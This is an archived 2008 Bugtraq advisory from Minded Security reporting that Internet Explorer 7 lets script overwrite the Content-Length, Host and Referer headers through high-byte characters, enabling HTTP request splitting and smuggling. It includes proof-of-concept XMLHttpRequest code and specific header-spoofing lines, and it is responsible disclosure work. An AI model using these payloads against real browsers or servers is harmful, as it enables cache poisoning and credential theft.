lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <1206097745.6274.48.camel@laptop>
Date: Fri, 21 Mar 2008 12:09:05 +0100
From: Minded Security Research Labs <research@...dedsecurity.com>
To: Btq <bugtraq@...urityfocus.com>
Subject: [MSA02240108] IE7 allows overwriting of several headers leading to
	Http request Splitting and smuggling.

MSA01240108:
IE7 allows overwriting of several headers leading to Http
request Splitting and smuggling.

Date: March 21th, 2008

Tested Versions: 
       Internet Explorer 7.0.5730.11

Tested OS:
       Windows XP Professional SP2 Italian

Minded Security ReferenceID:
        MSA02240108

Credits:
        Discovery by
        Stefano Di Paola of Minded Security
        stefano.dipaola [_at_] mindedsecurity.com

Permalink:
        http://www.mindedsecurity.com/MSA02240108.html


Severity: Medium/High

[ Summary ]

Internet Explorer 7 allows overwrite of headers such Content-Length,
Host and Referer, exposing the browser to Http Request Splitting.


[ Analysis ]

By trying the following javascript - or similar:

----------------------------------------------
var x=new XMLHttpRequest();

x.open("POST","/");
for(f=127;f<255;f++)
try{
 x.setRequestHeader("Host"+String.fromCharCode(f),"Test");
}catch(dd){}
x.setRequestHeader("Connection","keep-alive");
 x.onreadystatechange=function (){
    if (x.readyState == 4){
   }
 }
x.send("blah");
----------------------------------------------

Headers found to be overwritable are:

- Content-Length (one of the following):
   x.setRequestHeader("Content-Length"+String.fromCharCode(201),"0");
   
   x.setRequestHeader("Content-Length"+String.fromCharCode(233),"0");
   
   x.setRequestHeader("Content-Length"+String.fromCharCode(240)
   +String.fromCharCode(213),"0");

- Host (one of the following):

   x.setRequestHeader("Host"+String.fromCharCode(223),
   "www.microsoft.com");

- Referer (one of the following):

   x.setRequestHeader("Referer"+String.fromCharCode(205)+ 
   String.fromCharCode(155),"http://www.referrer.tld");

   x.setRequestHeader("Referer"+String.fromCharCode(237)+
   String.fromCharCode(155),"http://www.referrer.tld");

Several combination of characters > 127 were found to work, this
means that the chars listed above are only a working subset.

The effects of those issues are quite understandable from a security
point of view (see references):
1. Proxy cache poisoning
2. Credential stealing
3. several other attacks..

My understanding about the issue is that there's some
ascii-to-utf-8 / utf-8-to-ascii error which leads to some kind of
bypass when checking header names against protected ones.


[ Credits ]

Stefano di Paola is credited with the discovery of this vulnerability.

[ Thanks ]

To Amit Klein for his valuable research.

[ Disclosure Timeline ]

25/01/2008  Initial vendor notification
25/01/2008  Vendor Confirmed
21/03/2008  Public advisory


[ Reference ]

[1] "Http Request Smuggling", Chaim Linhart, Amit Klein, Ronen
   Heled, Steve Orrin, 2005.
   http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf

[2] "Exploiting the XmlHttpRequest object in IE - Referrer spoofing,
   and a lot more...", Amit Klein, 2005.
   http://www.securityfocus.com/archive/1/411585

[3] "HTTP Header Injection Vulnerabilities in the Flash Player
   Plugin", 2006.
   http://download2.rapid7.com/r7-0026/

[4] "Auto Injecting Cross Domain Scripting", pp 6-7, Stefano Di Paola,
   Giorgio Fedon, 2007
   http://www.wisec.it/docs.php?id=4


[ Disclaimer ]

The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever 
arising out of or in connection with the use or spread of this 
information.
Any use of this information is at the user's own risk.

Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of Minded Security Research Lab. If you wish to reprint the
whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research_at_mindedsecurity.com 
for permission.



        Copyright (c) 2008 Minded Security, S.r.l..

              All rights reserved worldwide.



-- 
---
Research Labs
Minded Security S.r.l.

Web: http://www.mindedsecurity.com

Mail: research_at_mindedsecurity.com



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ